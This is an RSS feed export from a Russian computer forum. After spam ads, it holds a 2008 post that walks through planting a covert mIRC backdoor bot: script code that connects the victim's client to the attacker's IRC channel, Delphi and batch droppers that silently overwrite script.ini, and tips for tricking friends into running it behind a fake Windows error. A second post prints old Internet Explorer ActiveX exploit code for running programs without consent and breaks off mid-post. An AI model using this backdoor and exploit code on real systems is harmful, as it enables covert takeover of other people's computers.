<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://ruscomp.forumbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>ruscomp</title>
		<link>http://ruscomp.forumbb.ru/</link>
		<description>ruscomp</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 30 Jun 2023 18:10:30 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Топовые мобильные прокси фермы MobileProxy.ru</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=30#p30</link>
			<description>&lt;p&gt;&lt;a href=&quot;https://postimages.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://i.postimg.cc/Y2VrXMMs/topgoods.jpg&quot; alt=&quot;https://i.postimg.cc/Y2VrXMMs/topgoods.jpg&quot; /&gt;&lt;/a&gt; Внимание, владельцы бизнеса! Представляем вам уникальное решение для оптимизации вашего интернет-присутствия - топовые мобильные прокси фермы от Mobileproxy.ru! &amp;#9989; Наше оборудование это передовое устройство, которое позволяет вам выходить в интернет сразу с нескольких IP-адресов из одного места. &amp;#9989; Однако важно отметить, что наша техника не обеспечивает анонимность и она не предназначена для обхода блокировок, выход в сеть осуществляется с использованием купленных вами сим-карт. &amp;#9989; Теперь самое интересное! Приобретая оборудование от Mobileproxy.ru с использованием промокода s455, вы получаете невероятную скидку в размере 5000 рублей! Это отличная возможность сэкономить и воспользоваться передовыми технологиями для вашего бизнеса. &amp;#9989; Наши мобильные прокси фермы откроют перед вами широкие возможности. Вы сможете одновременно управлять несколькими аккаунтами, заниматься продвижением сайтов, сдавать прокси ферму в аренду, собирать данные с разных источников одновременно и многое другое где нужно одновременно несколько подключений к сети и периодическая смена ip адреса. С Mobileproxy.ru ваш бизнес будет оперативным, эффективным и успешным! &amp;#9989; Не упустите возможность улучшить свое интернет-присутствие и сэкономить деньги! Посетите наш веб-сайт &amp;lt;a href=&amp;quot;https://mobileproxy.ru/&amp;quot;&amp;gt;MobileProxy.ru&amp;lt;/a&amp;gt;, выберите подходящее оборудование, введите промокод s455 при оформлении заказа и получите скидку в размере 5000 рублей! &amp;#9989; Mobileproxy.ru - ваш надежный партнер для успешного интернет-бизнеса!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (dbvasegbxd)</author>
			<pubDate>Fri, 30 Jun 2023 18:10:30 +0300</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=30#p30</guid>
		</item>
		<item>
			<title>Ремонт компьютеров,ноутбуков по России</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&amp;#160; &lt;a href=&quot;https://rempc-v-mo.ru/?t=33705&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://rempc-v-mo.ru/?t=33705&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (dbvasegbxd)</author>
			<pubDate>Fri, 17 Mar 2023 07:20:29 +0300</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=29#p29</guid>
		</item>
		<item>
			<title>RCHP</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=20#p20</link>
			<description>&lt;p&gt;киньте плз ссылки чтоб ск ачать их все альбомы!&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Sat, 14 Jun 2008 11:45:16 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=20#p20</guid>
		</item>
		<item>
			<title>Вешаем бота на винды.</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=19#p19</link>
			<description>&lt;p&gt;1. Intro.&lt;br /&gt;2. Трояны.&lt;br /&gt;3. mIRC скрипты.&lt;br /&gt;&amp;#160; &amp;#160; I. пишем свой скриптовый бэкдор&lt;br /&gt;&amp;#160; &amp;#160; II. пишем на delphi прогу, которая вставит бэкдора во вражеский mIRC&lt;br /&gt;&amp;#160; &amp;#160; III. пишем на batch&#039;ах прогу, которая вставит бэкдора во вражеский mIRC &lt;br /&gt;&amp;#160; &amp;#160; IV. cоциальный инженеринг: впариваем прогу =)&lt;br /&gt;4. Оба способа в сравнении.&lt;br /&gt;5. Как защититься.&lt;br /&gt;6. Outro.&lt;/p&gt;
						&lt;p&gt;1. В наши времена, среди владельцев популярных каналов, стало модным вешать на чанелы по дюжине ботов с разных linux shell&#039;ов для обеспечения, так сказать, &amp;quot;безопасности канала&amp;quot;. Я, конечно, ничего не имею против всяких там eggdrop&#039;ов, но как быть простым смертным юзерам, у которых нет ни шелла, ни сс, ни знаний (как например у элиты с канала #31337 на сервере irc.dal.net.ru =)? Так вот в этой статье я расскажу, как повесить бота на машину с win-подобной операционкой.&lt;br /&gt;Имхо, существует только два способа осуществить это: трояны и трояны =) Начнём с первого.&lt;/p&gt;
						&lt;p&gt;2. Если ты был на мсне (irc.msn.com) перед его закрытием, то ,наверное, успел насладиться n-ным кол-вом ботов на каналах #russian_chat, #russian_girls, #russian_andybig и тд. Так вот, эти боты далеко не eggdrop&#039;ы. Это, так сказать, SubSeven&#039;ы. Слышал про такой конь? Sub7 единственный троян на моей памяти, который позволял удалённо вешать irc-бота (я давно не юзал троянов, так что не знаю, появились ли у него аналоги). Так что качай Sub&#039;a отсюда и наслаждайся. Те же, кто не привыкли искать лёгких путей, могут читать дальше.&lt;/p&gt;
						&lt;p&gt;3. Возможности mirc-скриптов оочень даже внушительны. Написать на них тот же самый сgi-сканнер плёвое дело, не говоря уж о простеньком боте. Для примера возьмём скрипт WarSatan. В него как раз и встроен такой &amp;quot;простенький бот&amp;quot;. Когда вы соединяетесь со своим любимым irc-сервером, скрипт попутно коннектит юзера guest к серверу irc.webchat.org и заводит его на каналы #CHATOP, #MEKAH и #PANGKOR. Вот и весь механизм работы. Наша задача - написать такого же простого бэкдора в виде мирк-плагина.&lt;br /&gt;&amp;#160; I. Hаиболее важные строчки буду комментировать.&lt;/p&gt;
						&lt;p&gt;on 1:CONNECT:{&lt;br /&gt;&amp;#160; ;#открываем соединение с твоим irc cервером&lt;br /&gt;&amp;#160; .sockopen 31337 irc_сервер его_порт&lt;br /&gt;}&lt;br /&gt;on 1:DISCONNECT:{&lt;br /&gt;&amp;#160; ;#при разрыве соединения убиваем сокет&lt;br /&gt;&amp;#160; .sockclose 31337&lt;br /&gt;}&lt;br /&gt;on 1:SOCKOPEN:31337:{&lt;br /&gt;&amp;#160; ;#авторизуемся на irc-сервере&lt;br /&gt;&amp;#160; .sockwrite -n $sockname USER BOT &amp;quot;&amp;quot; &amp;quot;localhost&amp;quot; :Satanic bot&lt;br /&gt;&amp;#160; .sockwrite -n $sockname NICK ник_бота $+ $r(1,999)&lt;br /&gt;&amp;#160; ;#заходим на твой канал&lt;br /&gt;&amp;#160; .sockwrite -n $sockname join твой_канал&lt;br /&gt;} &lt;br /&gt;on 1:SOCKREAD:31337:{&lt;br /&gt;&amp;#160; ;#этот скрипт автоматически отвечает на серверный ping&lt;br /&gt;&amp;#160; ;#без него сервер будет кидать бота, потому что тот не отвечает на пинги&lt;br /&gt;&amp;#160; .sockread %tmp&lt;br /&gt;&amp;#160; if ($gettok(%tmp,1,32) == ping) {&lt;br /&gt;&amp;#160; &amp;#160; .sockwrite -n $sockname PONG $gettok(%tmp,2-,32)&lt;br /&gt;&amp;#160; }&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Убираем комментарии, подставляем свои значения, нумеруем строки (просто скопируй это всё в mIRC-редактор и сохрани - он сам всё пронумерует) и сохраняем получившееся в файл control.dll.&lt;br /&gt;Сам бэкдор готов. Теперь осталось вставить его в чужой script.ini.&lt;br /&gt;&amp;#160; II. Вот исходник на delphi проги, которая ищет на винте файл script.ini и, при удачном исходе поиска, подменяет его нашим. &lt;br /&gt;Важно! Control.dll нужно содержать в одном каталоге с данной прогой. &lt;/p&gt;
						&lt;p&gt;program Project1;&lt;/p&gt;
						&lt;p&gt;uses&lt;br /&gt;SysUtils,&lt;br /&gt;windows,&lt;br /&gt;shellapi;&lt;/p&gt;
						&lt;p&gt;const search = &#039;script.ini&#039;; //файл который нужно найти и заменить&lt;br /&gt;replace = &#039;control.dll&#039;; //файл, которым надо заменить, должен быть&lt;br /&gt;// в том же месте откуда запуститься эта прога =)&lt;/p&gt;
						&lt;p&gt;var buf: array [0..255] of char;&lt;br /&gt;fl: PChar;&lt;br /&gt;flag:boolean = false;&lt;/p&gt;
						&lt;p&gt;//процедура замены файлов&lt;br /&gt;procedure Change(where:pchar);&lt;/p&gt;
						&lt;p&gt;function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования&lt;br /&gt;var F : TShFileOpStruct;&lt;br /&gt;begin&lt;br /&gt;F.Wnd := 0; F.wFunc := FO_COPY;&lt;br /&gt;FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);&lt;br /&gt;ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);&lt;br /&gt;F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;&lt;br /&gt;{$I-}&lt;br /&gt;result:=ShFileOperation(F) = 0;&lt;br /&gt;{$I+}&lt;br /&gt;end;&lt;/p&gt;
						&lt;p&gt;begin&lt;br /&gt;DeleteFile(where);&lt;br /&gt;CopyFile(replace,where)&lt;br /&gt;end;&lt;/p&gt;
						&lt;p&gt;//процедура глоб. поиска&lt;br /&gt;function Find(DirN: string):boolean;&lt;br /&gt;var&lt;br /&gt;tsr: TSearchRec;&lt;br /&gt;Full: string;&lt;/p&gt;
						&lt;p&gt;begin&lt;br /&gt;find:=false;&lt;br /&gt;if FindFirst(DirN + &#039;\*.*&#039;, faAnyFile, tsr) = 0 then&lt;br /&gt;repeat&lt;br /&gt;if (tsr.Name = &#039;.&#039;) or (tsr.Name = &#039;..&#039;) then continue;&lt;br /&gt;Full:= DirN + &#039;\&#039; + tsr.Name;&lt;br /&gt;if tsr.Attr = faDirectory then //если каталог&lt;br /&gt;Find(Full);&lt;br /&gt;until (FindNext(tsr) &amp;lt;&amp;gt; 0)or(tsr.Name = search)or flag;&lt;/p&gt;
						&lt;p&gt;if tsr.Name = search //если нашли&lt;br /&gt;then begin&lt;br /&gt;find:=true;&lt;br /&gt;flag:=true;&lt;br /&gt;Change(pchar(DirN+&#039;\&#039;+tsr.Name));&lt;br /&gt;end;&lt;/p&gt;
						&lt;p&gt;end;&lt;/p&gt;
						&lt;p&gt;//Основной блок программы&lt;br /&gt;begin&lt;br /&gt;if SearchPath(nil,search,nil,sizeof(buf),buf,fl)&amp;gt;0 then&lt;br /&gt;Change(buf)&lt;br /&gt;else&lt;br /&gt;begin&lt;br /&gt;Find(&#039;c:&#039;);&lt;br /&gt;// если надо и на других дисках искать то можешь сделать так:&lt;br /&gt;// if Not Find(&#039;c:&#039;) then&lt;br /&gt;// if Not Find(&#039;d:&#039;) then&lt;br /&gt;// if Not Find(&#039;e:&#039;) then&lt;br /&gt;//etc....&lt;br /&gt;end;&lt;/p&gt;
						&lt;p&gt;end.&lt;/p&gt;
						&lt;p&gt;&amp;#160; III. Если же ты с роду не занимался кодингом и тя бросает в дрожжь от слова &amp;quot;компилятор&amp;quot;, давай напишем такую прогу на batch&#039;ах.&lt;/p&gt;
						&lt;p&gt;echo off&lt;br /&gt;cls&lt;br /&gt;if exist mirc.ini goto in_the_same_dir&lt;br /&gt;if exist c:\mirc\MIRC.INI set mirc=c:\mirc&lt;br /&gt;if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc&lt;br /&gt;if exist c:\irc\MIRC.INI set mirc=c:\irc&lt;br /&gt;if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc&lt;br /&gt;if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc&lt;br /&gt;if exist c:\chat\MIRC.INI set mirc=c:\chat&lt;br /&gt;if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc&lt;br /&gt;if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp&lt;br /&gt;if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp&lt;br /&gt;if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp&lt;br /&gt;if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp&lt;br /&gt;if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion&lt;br /&gt;if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra&lt;br /&gt;if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion&lt;br /&gt;if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa&lt;br /&gt;if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa&lt;br /&gt;if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa&lt;br /&gt;if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra&lt;br /&gt;if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra&lt;br /&gt;if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion&lt;br /&gt;if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion&lt;br /&gt;if exist c:\Trion\MIRC.INI set neo=c:\Trion&lt;br /&gt;if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa&lt;br /&gt;if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra&lt;br /&gt;if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa&lt;br /&gt;if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa&lt;br /&gt;if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra&lt;br /&gt;if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra&lt;br /&gt;if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion&lt;br /&gt;if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion&lt;br /&gt;if exist d:\Trion\MIRC.INI set neo=d:\Trion&lt;br /&gt;if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa&lt;br /&gt;if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra&lt;br /&gt;if exist d:\mirc\MIRC.INI set mirc=d:\mirc&lt;br /&gt;if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc&lt;br /&gt;if exist d:\irc\MIRC.INI set mirc=d:\irc&lt;br /&gt;if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc&lt;br /&gt;if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc&lt;br /&gt;if exist d:\chat\MIRC.INI set mirc=d:\chat&lt;br /&gt;if exist d:\looksharp\MIRC.INI set look=d:\looksharp&lt;br /&gt;if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp&lt;br /&gt;if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp&lt;br /&gt;if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp&lt;br /&gt;if &amp;quot;%mirc%&amp;quot;==&amp;quot;&amp;quot; goto no_mirc&lt;br /&gt;deltree /y %mirc%\script.ini&lt;br /&gt;copy control.dll %mirc%\script.ini&lt;br /&gt;cls&lt;br /&gt;:no_mirc&lt;br /&gt;if &amp;quot;%look%&amp;quot;==&amp;quot;&amp;quot; goto no_look&lt;br /&gt;deltree /y %look%\System\lookevents04.sys&lt;br /&gt;copy control.dll %look%\System\lookevents04.sys&lt;br /&gt;cls&lt;br /&gt;:no_look&lt;br /&gt;if &amp;quot;%neo%&amp;quot;==&amp;quot;&amp;quot; goto end&lt;br /&gt;deltree /y %neo%\root\trionscr7.ini&lt;br /&gt;copy control.dll %neo%\root\trionscr7.ini&lt;br /&gt;cls&lt;br /&gt;goto end&lt;br /&gt;:in_the_same_dir&lt;br /&gt;deltree /y script.ini&lt;br /&gt;copy control.dll script.ini&lt;br /&gt;:end&lt;br /&gt;echo Your Microsoft Windows is not correctly installed.&lt;br /&gt;echo Pleas re-install it and try again&lt;/p&gt;
						&lt;p&gt;Эта байда методом тыка ищет mIRC, NeoRa Trion и Looksharp. Вероятность нахождения довольно незначительна, так что желательно уломать субъекта положить это файло вместе с control.dll в один каталог с его irc-клиентом. В случае удачного исхода поиска, файло подменяет чужой script.ini нашим control.dll.&lt;br /&gt;Сконвертируй этот bat&#039;ник в exe&#039;шник каким-нибудь bat2exec&#039;ом и можешь впаривать своим друзьям. &lt;/p&gt;
						&lt;p&gt;&amp;#160; IV. Думаю, не мне тебе рассказывать о том, как &amp;quot;впаривать&amp;quot; кому-то exe&#039;шник. Просто хочется подчеркнуть одну особенность. Согласись, просьба запустить твой exe&#039;шник вызывет подозрение даже у самого недалёкого юзера. Так что, можно пойти другим путём. Для этого вернёмся к пункту I. НЕ НУМЕРУЙ строчки скрипта, просто засунь его в файл joke.mrc. Всё. Теперь раздавай его своим друзьям со словами: положи его в каталог со своим мирком, введи в его консоли &amp;quot;/load -rs joke.mrc&amp;quot; и наслаждайся всеми прелестями плагина =)&lt;/p&gt;
						&lt;p&gt;4. И так, чем же способ с подменой script.ini лучше?&lt;br /&gt;1) не ловится антивирусами&lt;br /&gt;2) не ловится FairWall&#039;ами. Думаю, многие сразу с пеной изо рта начнут доказывать, что ZoneAlarm и AtGuard оберегут их от этого. Спец для них объясняю: если mIRC в этих двух фаирволах прописан как Allowed server\client, то фв даже не пикнет при открытии соединения бэкдором.&lt;br /&gt;3) трудно обнаружить\убить даже опытному юзеру&lt;/p&gt;
						&lt;p&gt;5. Ну а теперь о том, как собственно защититься. Опять же не буду рассматривать способ с Sub7&#039;ом (т.к. с ним всё понятно: AVP + ZoneAlarm), сразу перейду ко второму. &lt;br /&gt;Для обнаружения скриптового бэкдора стоит воспользоваться каким-нибудь mIRC плагином вроди IPSearch&#039;a, который поискал бы на сервере юзера с таким же ипом как у тебя. Если таковой имеется, значит кто-то однозначно повесил на тебя бота. Если же такой не найден, значит или бот на другом сервере, или ты чист.&lt;br /&gt;Также, для обнаружения бота можно использовать тот же самый ZAlarm: на данный момент, крупнейшие IRC серверы, проверяют всех клиентов на прокси. Каким образом? Простым сканированием портов. Так вот, если ты коннектишься к серверу irc.some.com, a порты у тя сканирует какой-нибудь irc.lame.com, то стоит задумкаться...&lt;br /&gt;Как убить бэкдора? Если не разбираешься в скриптинге, просто переустанови irc клиент.&lt;/p&gt;
						&lt;p&gt;6. Ну что можно сказать в завершении? Не юзайте незнакомые скрипты и не заставляйте других это делать =)&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 13 Jun 2008 22:45:27 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=19#p19</guid>
		</item>
		<item>
			<title>ActiveX и безопасность в WWW</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=18#p18</link>
			<description>&lt;p&gt;Статья написана исключительно для ознакомительных целей и автор не несет никакой уголовной ответственности &lt;br /&gt;Что такое ActiveX в Internet&lt;br /&gt;ActiveX объекты представляют собой небольшие исполняемые модули, которые могут быть внедрены в документы. Такими докемнтами могут являтся, например, документы Word или Excel. В качестве документов-контейнеров могут быть также и web-страницы, написанные на HTML. При отображении такой страницы, браузер предоставляет внедренному модулю ActiveX прямоугольную область на странице. В этой области модуль может себя прорисовывать, взаимодействовать с пользователем, принимать и выводить даные и т.д. Помимо визуальных activex объектов, существуют и невизуальные. Они служат главным образом для доступа к определенным програмным ресурсам машины или к данным пользователя и операционной системы. Такие объекты можно сделать невидимыми на странице и обращатся к ним при помощи скриптов страницы (таких как JavaScript, например). &lt;/p&gt;
						&lt;p&gt;Следует четко определить разницу между выполнением модуля ActiveX, размещенного на странице, и скрипта на той же странице. Скриптовые языки не генерируют исполняемых модулей. Скрипты выполняет виртуальная машина, которая их четко контроллирует и ограничивает воздействие на машину пользователя. Так, например, скрипт на JavaScript не может напрямую обращаться ни к файлам пользователя, ни к оперативной памяти, ни к сетевой плате. Это гарантирует безопасность для пользователя, просматривающего web-страницу. Другое дело - AcitveX. Эти объекты представляют собой исполняемые модули (как правило .ocx), которые выполняются непосредственно процессором машины и имеют те же права что и любая другая программа компьютера. Таким образом, выполнение внедренных объектов небезопасно для пользователя. &lt;/p&gt;
						&lt;p&gt;Проблему безопасности Microsoft - родоначальник activeX - решает с помощью так называемых сертификатов безопасности. Суть в том, что каждый ActiveX объект должен иметь сертификат безопасности. И если пользователь доверяет автору объекта, то только в таком случе объект будет автоматически запускаться со страницы. В противном случае браузер запросит разрешения на запуск ActiveX у пользователя, либо вообще откажется выполнять ActiveX (если установлен достаточно высокий уровень безопасности в настройках пользователя). При этом, по умолчанию, в Windows сертифицированны только безопасные объекты, безвредные для пользователя. Для всех остальных объектов, и для установки, и для каждого запуска, ОС требует разрешения у пользователя. &lt;/p&gt;
						&lt;p&gt;Конечно, такая политика также не безопасна, поскольку в основном своем большинстве пользователи мало осведомлены о тонкостях технологий Microsoft и могут подтверждать запуск ActiveX, не осознавая опасности последствий. Тем более, что логика подсказывает пользователю то, что если он откажется выполнять ActiveX, то он, вероятно, не получит необходимую информацию с данного web-сайта. То же касается настроек уровня безопасности браузера. По умолчанию, установлен средний уровень безопасности. В этом режиме MSIE 6.0 вообще не позволяет запуск несертифицированных объектов, однако пользователь в таком режиме не сможет просматривать значительную часть веб-сайтов, использующих ActiveX. &lt;br /&gt;Методы несанкционированного запуска ActiveX&lt;br /&gt;Все было бы замечательно, если бы в технологии ActiveX не было дыр. В соверменном быстро развивающемся мире, новые технологии успевают появлятся быстрее чем исправляются ошибки в старых. В связи с чем, число уязвимостей не сокращается. ActiveX - не исключение. &lt;/p&gt;
						&lt;p&gt;В этой главе рассмотрим два типа уязвимости современных браузеров, основаных на несанкционированном запуске ActiveX. &lt;/p&gt;
						&lt;p&gt;Сначала продемонстрируем запуск сертифицированного ActiveX объекта. Для этой цели используем объект DirectAnimation: &lt;/p&gt;
						&lt;p&gt;&amp;lt;APPLET ID=&amp;quot;DAControl&amp;quot;&lt;br /&gt; CLASSID=&amp;quot;CLSID:B6FFC24C-7E13-11D0-9B47-00C04FC2F51D&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;/APPLET&amp;gt; &lt;/p&gt;
						&lt;p&gt;Выполнение этого ActiveX объекта смотрите здесь . &lt;br /&gt;Обратим внимание на параметр B6FFC24C-7E13-11D0-9B47-00C04FC2F51D. Это уникальный идентификатор типа объекта (CLSID). CLSID однозначно говорит операционной системе какой именно объект страничка хочет использовать. CLSID одного и того же объекта одинаков на всех машинах пользователей. После запуска объекта, скрипт получает доступ к свойствам и методам объекта через его id. Например такой скрипт &amp;lt;script&amp;gt;DAControl.Start()&amp;lt;/script&amp;gt; запускает анимацию объекта DirectAnimation. Отметим, что на активацию объекта требуется время, и поэтому данный скрипт нужно запускать только после того, как страница полностью загрузилась и объект активирован. Скрипт можно использовать в качестве обработчика события body.onload, которое генерируется после загрузки и активации объекта. Попытка управления незагрузившимся объектом приводит к ошибке. &lt;/p&gt;
						&lt;p&gt;Теперь рассмотрим запуск несертифицированного ActiveX объекта. Воспользуемся невизуальным объектом WScript.Network. Этот объект позволяет получить и изменить некоторые параметры операционой системы, такие как имя пользователя или имя компьютера: &lt;/p&gt;
						&lt;p&gt;&amp;lt;APPLET ID=&amp;quot;WshNetwork&amp;quot;&lt;br /&gt; CLASSID=&amp;quot;CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;/APPLET&amp;gt; &lt;/p&gt;
						&lt;p&gt;Демонстрацию этого объекта смотрите здесь . При открытии демо-странички браузер спросит у вас разрешения на запуск объекта. Попробуйте согласиться или нет, посмотрите на результат. &lt;br /&gt;(Заметим, что если вы сохраните эту страничку на свой диск и попробуете открыть ее, то возможно ОС и не спросит разрешения на запуск ActiveX, поскольку считает его &amp;quot;родным&amp;quot; файлом, а не сетевым). &lt;br /&gt;Обратим внимание на то, что в случае получения разрешения запуска этого объекта, скрипт страницы получает доступ к информации о вашей машине и может отправить ее в сеть, уже не спрашивая вас и незаметно для вас. Кроме того данный объект может сделать ваш диск сетевым и его содержимое станет доступно с других машин. &lt;/p&gt;
						&lt;p&gt;Итак, для запуска опасных объектов пользователь должен обязательно дать согласие. Теперь рассмотрим уязвимости MSIE, позволяющие обойти это условие, и запустить ActiveX без разрешения пользователя. &lt;/p&gt;
						&lt;p&gt;Рассмотрим известный пример уязвимости найденной в марте 2002 года, и присутствующей практически во всех версиях операционных систем и браузеров: &lt;/p&gt;
						&lt;p&gt;&amp;lt;span datasrc=&amp;quot;#oExec&amp;quot; datafld=&amp;quot;exploit&amp;quot; dataformatas=&amp;quot;html&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;xml id=&amp;quot;oExec&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;security&amp;gt;&amp;lt;exploit&amp;gt;&amp;lt;![CDATA[&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;&lt;br /&gt;&amp;lt;object id=&amp;quot;oFile&amp;quot; classid=&amp;quot;clsid:11111111-1111-1111-1111-111111111111&amp;quot;&amp;#160; codebase=&amp;quot;c:/WINDOWS/calc.exe&amp;quot;&amp;gt;&amp;lt;/object&amp;gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;&lt;br /&gt;]]&amp;gt;&amp;lt;/exploit&amp;gt;&amp;lt;/security&amp;gt;&lt;br /&gt;&amp;lt;/xml&amp;gt; &lt;/p&gt;
						&lt;p&gt;Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним). Пример&amp;#160; демонстрирует запуск калькулятора (при условии что он находится в папке c:/WINDOWS/). Разумеется, вместо калькулятора, может быть запущено и форматирование дисков. Впрочем, не рекомендую эксперементировать :). &lt;/p&gt;
						&lt;p&gt;Данная уязвимость основана на том, что в качестве CLSID передается заведомо неверный идентификатор несуществующего объекта. Если операционная система не может найти объект у себя на дисках, то она пытается скачать его. Для указания пути скачивания применяется параметр codebase. Но в данном случае он указывает на локальную программу и система запускает ее, считая что она &amp;quot;установит&amp;quot; несуществующий объект. Такая уязвимость присутствует только в контексте XML. Без XML такой пример, скорее всего, работать не будет: &lt;/p&gt;
						&lt;p&gt;&amp;lt;object id=&amp;quot;oFile&amp;quot; classid=&amp;quot;clsid:11111111-1111-1111-1111-111111111111&amp;quot;&amp;#160; codebase=&amp;quot;c:/WINDOWS/calc.exe&amp;quot;&amp;gt;&amp;lt;/object&amp;gt; &lt;/p&gt;
						&lt;p&gt;Рассмотренная уязвимость опасна, однако ее воздействие на машину сильно ограничено, поскольку web-страница может только запустить программу на машине пользователя, но не может ею управлять. Максимум что возможно это передать параметры через командную строку. &lt;/p&gt;
						&lt;p&gt;Теперь рассмотрим еще одну уязвимость, позволяющую запустить ActiveX объект без санкции пользователя. Данная уязвимость присутствует не во всех операционных системах и браузерах и, кроме того, зависит от конкретных настроек окружения (более подробно об этом - в следующей главе). Однако ее воздействие намного сильнее рассмотренной выше уязвимости, поскольку скрипт страницы получает управление объектом ActiveX. &lt;/p&gt;
						&lt;p&gt;В качестве рабочего объекта применяется следующий объект: &lt;/p&gt;
						&lt;p&gt;&amp;lt;applet id=&amp;quot;theActiveX&amp;quot; &lt;br /&gt;code=com.ms.activeX.ActiveXComponent&lt;br /&gt;height=0 width=0&amp;gt;&lt;br /&gt;&amp;lt;/applet&amp;gt; &lt;/p&gt;
						&lt;p&gt;При активации этого объекта эксплорер не запрашивает разрешения у пользователя, поскольку объект сертифицирован. &lt;br /&gt;После загрузки ActiveX, модифицируем его CLSID, заменяя его на CLSID необходимого нам несертифицированного ActiveX (в данном случае WScript.Network): &lt;/p&gt;
						&lt;p&gt;&amp;lt;script&amp;gt;&lt;/p&gt;
						&lt;p&gt;function modify(){&lt;/p&gt;
						&lt;p&gt;theActiveX.setCLSID(&amp;quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&amp;quot;)//заменяем CLSID&lt;/p&gt;
						&lt;p&gt;//Именно в этом месте кроется уязвимость. &lt;br /&gt;//Если браузер выдает ошибку в следующем операторе, значит он не подвержен уязвимости&lt;/p&gt;
						&lt;p&gt;theActiveX.createInstance()//создаем новый объект&lt;/p&gt;
						&lt;p&gt;WshNetwork = theActiveX.GetObject()//получаем модифицированый объект&lt;/p&gt;
						&lt;p&gt;var userName=WshNetwork.UserName;//получаем информацию о пользователе&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;Приведенный скрипт нужно запускать спустя некторое время после загрузки странички, поскольку объекту требуется время чтобы активироваться: &lt;/p&gt;
